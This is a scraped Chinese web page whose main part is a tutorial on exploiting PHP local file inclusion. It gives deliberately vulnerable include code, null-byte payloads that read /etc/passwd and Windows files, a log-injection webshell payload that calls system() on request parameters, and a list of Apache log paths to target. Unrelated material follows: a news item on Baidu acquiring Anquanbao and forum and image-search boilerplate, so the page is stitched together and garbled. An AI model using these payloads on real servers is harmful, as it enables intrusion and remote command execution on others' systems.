PHP本地文件包含(LFI)漏洞利用>>脚本渗透>>中国云安网 Www.Yunsec.Net -
热门关键字： 　　 　 　 　 　
PHP本地文件包含(LFI)漏洞利用
摘要：这次学习的主要参考资料是：http://downloads.ackack.net/LocalFileInclusion.pdf 实验代码： 如果是在linux上，直接提交：test.php?for=/etc/passwd%00即可显示该文件。 ? php include($_GET['for']..php);//用于测试本地包含漏洞 ? 如果是在win上，提交：t...
这次学习的主要参考资料是：http://downloads.ackack.net/LocalFileInclusion.pdf
实验代码：
如果是在上，直接提交：test.php?for=/etc/passwd%00即可显示该文件。
&include($_GET['for'].&.php&);//用于测试本地包含&&
如果是在win上，提交：test.php?for=D:\tools\readme.txt%00，就可以了，跨目录跨盘符。这里要注意，对于过多的&..\&，360会自动拦截，比较好的办法是使用ie或者ff。
但是光是浏览文件是不够的，我们还需要webshell。可以使用log injection的方法。这也是我作这个记录的主要目的，这才是重点所在。
这里，思想的核心是要将php代码注入到log中，比如，我们可以将：
&$s=$_GET;@chdir($s['x']);echo&@system($s['y'])&
注入进去（浏览器的自动更改实在太烦人）。注：friddle2不会对针对本机的访问过滤，我就输入本机的地址：192.168.0.1。
然后访问：test.php?for=/var/log/apache/logs/error_log%00&x=/&y=uname，这是针对linux。如果平台切换到win，可以访问：test.php?for=..\apache\logs\error.log%00&x=.y=dir，会显示当前目录文件。
当然，我们也可以将日志记录到aess.log里，但那样会更复杂一些，因为需要包含的文件会更大。
参考文献还提到了：使用linux的/proc/self/fd进行注入的方法，我对linux不熟悉，所以也没有细看，以后需要的时候再了解吧。
额外的发现：
360浏览器有个奇怪的特性，当访问/search/error.html%00../../../../../../tools后，会访问一下目录：D:\Program files\360se\tools 看看有没有这个文件夹，这里有问题吧？TDH
D:\Program files\360se\360se3\http:\apache\logs\error.log%00&y=dir和http://192.168.0.1:88/test.php?for=..\..\..\apache\logs\error.log%00&y=dir，这两者之间的关系是怎么得来的？
1、可能的log路径、
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
摘自 http://kingbase.org
标签分类：百度阅读_正版电子书在线阅读
中信出版社
华章数字媒体
北京磨铁数盟信息技术有限公司
湖北长江新世纪
新星出版社
中南博集天卷
投诉与建议
扫描下载客户端查看: 1682|回复: 1
安全宝CEO马杰将出任百度云安全总监
bambooslip
网易科技讯&&
4月15日晚间，安全宝向网易科技确认，安全宝CEO马杰将出任百度云安全总监，全面负责百度云安全部门的工作。今天下午，安全宝向媒体确认，已由百度全资收购。安全宝官方称，安全宝此前是由创新工场、北极光联合百度、阿里、腾讯联合投资的。安全宝也是目前为止BAT三家联合投资的安全领域的唯一企业。百度此次全资收购安全宝，其他投资者将退出。
安全宝是国内第一家完全基于SaaS模式为用户提供安全防护服务的公司。作为李开复先生创办的创新工场中唯一一个安全领域的投资项目，安全宝被国家某涉密机构指定为安全技术支持单位，并被授予“国家级高新技术企业”称号。并购完成后，百度将加大安全宝品牌的推广力度，并和百度云加速融合，联手为企业客户提供安全防护服务，帮助企业客户防范黑客入侵和DDoS攻击，提升WEB响应和网站访问速度，保障DNS健康运行，提高网页的搜索引擎权重。
安全宝创始人兼CEO马杰，是反病毒与网络安全专家，亚洲反病毒研究者组织（AVAR）理事。
年，马杰担任豪杰公司研发部负责人，跟随豪杰公司创始人梁肇新开发中国软件史上传奇产品《超级解霸》系列。年，马杰曾经担任瑞星公司研发总经理，主持开发了从个人杀毒软件到企业级安全硬件在内的大量产品。年，在创立安全宝之前，马杰受邀加入李开复的创新工场，担任技术总监，并成为第一任EIR。2011年起，马杰创立了国内首个基于SaaS的云安全服务品牌“安全宝”，改变了传统安全产品价格高性能低的矛盾，专业为网站解决黑客入侵和DDoS等各类攻击问题。安全宝突破性的设计获得了TechCrunch全球创业大赛亚军。
版区有你更精彩： ）
梦境守望者
看成宝马CEO的自觉加RQ
1s启动到宽带峰值，下载就是这么倍儿爽
Copyright & KaFan & All Rights Reserved.
Powered by Discuz! X3.1( 苏ICP备号 ) GMT+8,百度图片—全球最大中文图片库
拖拽图片到此处试试
识别人物、搜索服饰、寻找高清素材、浏览相似美图，尽在百度识图!}